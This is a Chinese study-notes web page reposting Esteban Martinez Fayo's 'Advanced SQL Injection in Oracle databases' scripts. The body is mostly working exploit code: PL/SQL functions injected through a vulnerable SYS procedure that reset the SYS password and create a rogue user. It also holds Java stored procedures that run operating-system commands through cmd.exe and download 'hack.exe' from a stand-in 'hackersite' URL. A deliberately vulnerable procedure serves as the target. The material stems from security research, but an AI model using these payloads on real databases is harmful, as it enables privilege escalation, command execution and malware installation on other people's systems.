Oracle 数据库注入技术_ORACLE_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

Oracle 数据库注入技术

作者：闵涛文章来源：闵涛的学习笔记点击数：592 更新时间：2009/4/22 22:03:17

/*
Advanced SQL Injection in Oracle databases
Becoming the SYS user with SQL Injection.
This script creates functions that can be injected to replace
the password of the SYS user and to restore it to the original value.

By Esteban Martinez Fayo
secemf@gmail.com
*/
------------
-- Execute this as a low privilege user
------------

--This table is optional if you don''''t want to save the old SYS password
CREATE TABLE "SCOTT"."PSW_DATA" ("USERNAME" VARCHAR2(32 byte) NOT NULL,
"PSW_HASH" VARCHAR2(30 byte) NOT NULL);

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI_CHANGEPSW" return varchar2
authid current_user as
pragma autonomous_transaction;
ROW_COUNT NUMERIC;
PSW VARCHAR2(30);
BEGIN
EXECUTE IMMEDIATE ''''SELECT COUNT(*) FROM SCOTT.PSW_DATA'''' INTO ROW_COUNT;
IF (ROW_COUNT <= 0) THEN
EXECUTE IMMEDIATE ''''INSERT INTO SCOTT.PSW_DATA select username,
password from dba_users where username=''''''''SYS'''''''''''';
EXECUTE IMMEDIATE ''''ALTER USER SYS IDENTIFIED BY newpsw'''';
END IF;
COMMIT;
RETURN '''''''';
END;
/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI_RESTOREPSW" return varchar2
authid current_user as
pragma autonomous_transaction;
PSW_HASH VARCHAR2(30);
BEGIN
EXECUTE IMMEDIATE ''''SELECT PSW_HASH FROM SCOTT.PSW_DATA WHERE 
USERNAME = ''''''''SYS'''''''''''' INTO PSW_HASH;
EXECUTE IMMEDIATE ''''ALTER USER SYS IDENTIFIED BY VALUES '''''''''''' || PSW_HASH || '''''''''''''''';
EXECUTE IMMEDIATE ''''DELETE FROM SCOTT.PSW_DATA where username=''''''''SYS'''''''''''';
COMMIT;
RETURN '''''''';
END;
/


-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists
-- in a single PL/SQL statement (not in an anonymous PL/SQL block).
-- See file SQLInjectionLimitation.sql
-- To change the SYS password execute:
EXEC SYS.SQLIVULN(''''MANAGER''''''''||SCOTT.SQLI_CHANGEPSW()||'''''''''''');

-- To restore the SYS password execute:
EXEC SYS.SQLIVULN(''''MANAGER''''''''||SCOTT.SQLI_RESTOREPSW()||'''''''''''');

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases
Executing OS Command with SQL Injection

By Esteban Martinez Fayo
secemf@gmail.com
*/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2
authid current_user as
pragma autonomous_transaction;
SqlCommand VARCHAR2(2048);

BEGIN
SqlCommand := ''''
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
import java.lang.*;
import java.io.*;

public class ExecuteOS
{
public static void printFile (String fileName) throws IOException
{
File fileOut;
FileReader fileReaderOut;
BufferedReader buffReader;
String strRead;

fileOut = new File (fileName);
fileReaderOut = new FileReader (fileOut);
buffReader = new BufferedReader(fileReaderOut);
while ((strRead = buffReader.readLine()) != null)
System.out.println(strRead);
}

public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException
{
String[] strCmd = {"cmd.exe", "/c", "1>c:\\stdout.txt", "2>c:\\stderr.txt", cmd};

System.out.println("==========\r\nExecuting OS command...");
Process p = Runtime.getRuntime().exec(strCmd);
p.waitFor();
System.out.println("\r\n==========\r\nThis was the STANDARD OUTPUT for the command:");
printFile ("c:\\stdout.txt");
System.out.println("\r\n==========\r\nThis was the ERROR OUTPUT for the command:");
printFile ("c:\\stderr.txt");
}
}'''';
execute immediate SqlCommand;

SqlCommand := ''''
CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
AS LANGUAGE JAVA
NAME ''''''''ExecuteOS.execOSCmd (java.lang.String)'''''''';'''';
execute immediate SqlCommand;

execute immediate ''''GRANT EXECUTE ON PROC_EXECUTEOS TO SCOTT'''';

commit; -- Must do a commit
return ''''''''; -- Must return a value
END;
/

-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists
-- in a single PL/SQL statement (not in an anonymous PL/SQL block).
-- See file SQLInjectionLimitation.sql
EXEC SYS.SQLIVULN(''''MANAGER''''''''||SCOTT.SQLI()||'''''''''''');
/
SET SERVEROUTPUT ON
/
CALL dbms_java.set_output(1999);
/
EXEC sys.proc_executeos (''''dir'''');

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases

By Esteban Martinez Fayo
secemf@gmail.com
*/
------------
-- Execute this as a SYS
------------

-- SQLVULN is a procedure vulnerable to SQL Injection. The vulnerability exists
-- in a single PL/SQL statement (not in an anonymous PL/SQL block).
CREATE OR REPLACE PROCEDURE "SYS"."SQLIVULN" (P_JOB VARCHAR2)
AS
AVGSAL Numeric;
BEGIN
EXECUTE IMMEDIATE ''''SELECT AVG(SAL) FROM SCOTT.EMP WHERE JOB = ''''''''''''||P_JOB||'''''''''''''''' INTO AVGSAL;
DBMS_OUTPUT.PUT_LINE(''''Average salary for the job is: ''''||AVGSAL);
END;
/
GRANT EXECUTE ON "SYS"."SQLIVULN" TO "SCOTT"
/


------------
-- Execute this as a low privilege user
------------
CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2
authid current_user as
BEGIN
execute immediate ''''INSERT INTO SYS.PPT (PPC) VALUES (''''''''55'''''''')'''';
commit;
return '''''''';
END;
/

--To exploit
EXEC SYS.SQLIVULN(''''MANAGER'''''''' || SCOTT.SQLI() || '''''''''''');
-- This gives an Oracle Error

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases
Uploading a file with SQL Injection
SYS.SQLIVULN is a procedure vulnerable to SQL Injection

By Esteban Martinez Fayo
secemf@gmail.com
*/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2
authid current_user as
pragma autonomous_transaction;
SqlCommand VARCHAR2(2048);

BEGIN
SqlCommand := ''''
CREATE OR REPLACE JAVA SOURCE NAMED "SRC_FILE_UPLOAD" AS
import java.lang.*;
import java.io.*;

public class FileUpload {
public static void fileUpload(String myFile, String url) throws Exception
{
File binaryFile = new File(myFile);
FileOutputStream outStream = new FileOutputStream(binaryFile);
java.net.URL u = new java.net.URL(url);
java.net.URLConnection uc = u.openConnection();
InputStream is = (InputStream)uc.getInputStream();
BufferedReader in = new BufferedReader (new InputStreamReader (is));
byte buffer[] = new byte[1024];
int length = -1;
while ((length = is.read(buffer)) != -1) {
outStream.write(buffer, 0, length);
outStream.flush(); }
is.close(); outStream.close();
} };'''';
execute immediate SqlCommand;

SqlCommand := ''''
CREATE OR REPLACE PROCEDURE "PROC_FILEUPLOAD" (p_file varchar2, p_url varchar2)
AS LANGUAGE JAVA
NAME ''''''''FileUpload.fileUpload (java.lang.String, java.lang.String)'''''''';'''';
execute immediate SqlCommand;

execute immediate ''''GRANT EXECUTE ON PROC_FILEUPLOAD TO SCOTT'''';

commit; -- Must do a commit
return ''''''''; -- Must return a value
END;
/

SET SERVEROUTPUT ON
/
CALL dbms_java.set_output(1999);
/
-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. 
-- The vulnerability exists
-- in a single PL/SQL statement (not in an anonymous PL/SQL block).
-- See file SQLInjectionLimitation.sql
EXEC SYS.SQLIVULN(''''MANAGER''''''''||SCOTT.SQLI()||'''''''''''');
/

-- Call the procedure created in the SQL Injection
EXEC sys.proc_fileupload (''''c:\hack.exe'''', ''''http://hackersite/hack.exe'''');

--------------------------------------------------------------------------------------------------------

/*
Advanced SQL Injection in Oracle databases
Example of a function derfined with authid current_user
vulnerable to SQL Injection in a PL/SQL anonymous block.

By Esteban Martinez Fayo
secemf@gmail.com
*/

------------
-- Execute this as a SYS or any other user that can create functions
------------

-- SQLIVULN_CUR_USR is a function vulnerable to SQL Injection in a PL/SQL anonymous
-- block that executes with the privilege of the caller (defined with AUTHID CURRENT_USER).
CREATE OR REPLACE FUNCTION "SYS"."SQLIVULN_CUR_USR" (P_JOB VARCHAR2)
return VARCHAR2
authid current_user as
AVGSAL Numeric;
BEGIN
EXECUTE IMMEDIATE ''''BEGIN SELECT AVG(SAL) INTO :AVGSAL FROM SCOTT.EMP
WHERE JOB = ''''''''''''||P_JOB||''''''''''''; END;'''' USING OUT AVGSAL;
return '''''''';
END;
/


GRANT EXECUTE ON "SYS"."SQLIVULN_CUR_USR" TO "SCOTT"
/


-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists
-- in a single PL/SQL statement (not in an anonymous PL/SQL block).
-- See file SQLInjectionLimitation.sql
-- To Exploit the attacker could execute:
EXEC SYS.SQLIVULN(''''MANAGER''''''''||SYS.SQLIVULN_CUR_USR(''''''''AA''''''''''''''''; execute immediate
''''''''''''''''declare pragma autonomous_transaction; begin execute immediate ''''''''''''''''''''''''''''''''create
user eric identified by newpsw''''''''''''''''''''''''''''''''; commit; end;''''''''''''''''; end;--'''''''')||'''''''''''');

[系统软件]EXP-00008: ORACLE error 904 encountered的解决方…  [常用软件]PB7 连接 Oracle 的配置方法
[Web开发]oracle Export and Import 简介  [Web开发]ADO访问Oracle结果集的心得
[JAVA开发]JDBC+Hibernate将Blob数据写入Oracle  [JAVA开发]J2EE应用中与Oracle数据库的连接
[JAVA开发]Oracle Application Serve_  [其他]HP-UXrx2600B.11.22Uia64安装oracle9i9.2foria64手…
[其他]在RedhatEnterpriseserver3上安装oracle9iR2的注意…  [其他]PROC＋＋批量导入导出ORACLE数据库表

教程录入：mintao 责任编辑：mintao

上一篇教程：我的一个读写oracle大字段的类（源码）

下一篇教程： Oracle SQLCODE/SQLERRM

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· Sql Server  · MySql
· Access  · ORACLE
· SyBase  · 其他

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……